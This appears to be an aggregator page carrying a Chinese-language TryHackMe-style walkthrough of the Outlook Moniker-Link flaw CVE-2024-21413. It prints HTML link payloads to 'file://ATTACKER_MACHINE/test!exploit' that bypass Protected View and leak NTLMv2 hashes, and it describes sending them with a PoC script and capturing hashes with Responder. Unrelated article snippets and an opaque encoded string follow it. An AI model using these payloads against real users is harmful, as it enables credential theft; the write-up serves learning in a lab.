news 2026/4/23 11:07:14

微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

Moniker-Link微软威胁分析:CVE-2024–21413

作者:#$ubh@nk@r
阅读时间:约3分钟
发布日期:2024年2月23日

简介:各位黑客朋友大家好!今天我将为大家介绍近期微软Outlook产品的一个漏洞。该漏洞于2024年2月13日公布。让我们深入了解其细节以及如何利用它。

此漏洞在处理一种特定类型的超链接(称为Moniker Link)时,能够绕过Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦用户点击该超链接,Outlook就会将用户的NTLMv2凭据发送给攻击者。

漏洞原理展示:

Outlook可以将电子邮件渲染为HTML。此外,Outlook能够解析诸如HTTP和HTTPS之类的超链接。然而,它也可以打开指向特定应用程序的URL,这些被称为Moniker Links。

通常,当触发外部应用程序时,Outlook会弹出安全警告。如果使用的是skypekeyword,那么警告会像这样显示。
这个弹窗是Outlook“受保护的视图”功能的结果。如果攻击者创建一个恶意超链接,同样会产生安全警报。

<p><ahref="file://ATTACKER_MACHINE/test">Click me</a></p>

但是,这个警报可以通过使用一个特殊字符来绕过 →!

<p><ahref="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

利用过程:

要利用此漏洞,我们需要创建一个邮件服务器。你可以在TryHackMe实验室中尝试。

CMNatic帮助我们创建了一个Python脚本,用于通过SMTPServer自动化地向受害者发送邮件。

GitHub - CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM Lab
CVE-2024-21413 PoC for THM Lab. 在GitHub上创建账户以贡献CMNatic/CVE-2024-21413的开发。
github.com

现在运行脚本。
注意:请在第31行将Attacker_IP和MAILSERVER_IP修改为受害者的IP地址。
邮件已送达。

现在启动你的Responder来捕获NTLM哈希。

打开受害者的Outlook收件箱。你可以看到邮件已经送达。现在,如果你点击“Click me”,由于那个特殊字符!的存在,将不会弹出安全警报。否则,它会显示警报。

如果你点击了该链接,你将会获得受害者的NTLM哈希。

总结:

以上就是该漏洞的利用方式。

感谢阅读!

如果你喜欢这篇文章,别忘了点赞并关注我,以获取更多文章。

祝黑客之旅愉快~
CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLQKZqtp5udwihyDPFTm5IRv37dlo2W+4VY3z1d0M7aWubJiUxybkI3nx55gCmDWobsitrjS0yiQJF3ZKoUJ66E
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/19 22:42:55

5个关键步骤:掌握USD Unity SDK的完整工作流

5个关键步骤&#xff1a;掌握USD Unity SDK的完整工作流 【免费下载链接】usd-unity-sdk Integration of Pixars Universal Scene Description into Unity 项目地址: https://gitcode.com/gh_mirrors/us/usd-unity-sdk Universal Scene Description (USD) 作为Pixar开发…

作者头像 李华
网站建设 2026/4/18 13:25:54

AlphaPi开发板物联网项目终极指南:从零到精通的完整教程

AlphaPi开发板物联网项目终极指南&#xff1a;从零到精通的完整教程 【免费下载链接】AlphaPi 项目地址: https://gitcode.com/gh_mirrors/al/AlphaPi AlphaPi开发板是专为物联网应用设计的嵌入式开发平台&#xff0c;集成了LED矩阵显示、三轴加速度计、物理按键等丰富…

作者头像 李华
网站建设 2026/4/18 10:06:25

NUIST本科毕业论文LaTeX排版完整教程:从零到精通的终极指南

还在为毕业论文格式问题头疼吗&#xff1f;南信大专属LaTeX模板帮你彻底告别排版烦恼&#xff01;本教程将手把手教你如何快速掌握LaTeX排版技巧&#xff0c;让论文格式一次到位&#xff0c;专注内容创作。无论你是LaTeX小白还是有一定基础的用户&#xff0c;都能在这里找到适合…

作者头像 李华
网站建设 2026/4/18 7:54:12

UE5实时3D高斯渲染终极指南:从零基础到专业创作

UE5实时3D高斯渲染终极指南&#xff1a;从零基础到专业创作 【免费下载链接】XV3DGS-UEPlugin 项目地址: https://gitcode.com/gh_mirrors/xv/XV3DGS-UEPlugin 在当今数字内容创作领域&#xff0c;实时3D渲染技术正经历革命性变革。XV3DGS-UEPlugin作为XVERSE Technolo…

作者头像 李华
网站建设 2026/4/20 23:53:10

拯救者Y7000系列BIOS隐藏功能完全解锁终极指南

拯救者Y7000系列BIOS隐藏功能完全解锁终极指南 【免费下载链接】LEGION_Y7000Series_Insyde_Advanced_Settings_Tools 支持一键修改 Insyde BIOS 隐藏选项的小工具&#xff0c;例如关闭CFG LOCK、修改DVMT等等 项目地址: https://gitcode.com/gh_mirrors/le/LEGION_Y7000Seri…

作者头像 李华
网站建设 2026/4/18 2:58:04

openISP终极指南:5个核心技巧快速掌握开源图像信号处理器

openISP终极指南&#xff1a;5个核心技巧快速掌握开源图像信号处理器 【免费下载链接】openISP Image Signal Processor 项目地址: https://gitcode.com/gh_mirrors/op/openISP 在数字图像处理技术快速发展的今天&#xff0c;图像信号处理器&#xff08;ISP&#xff09;…

作者头像 李华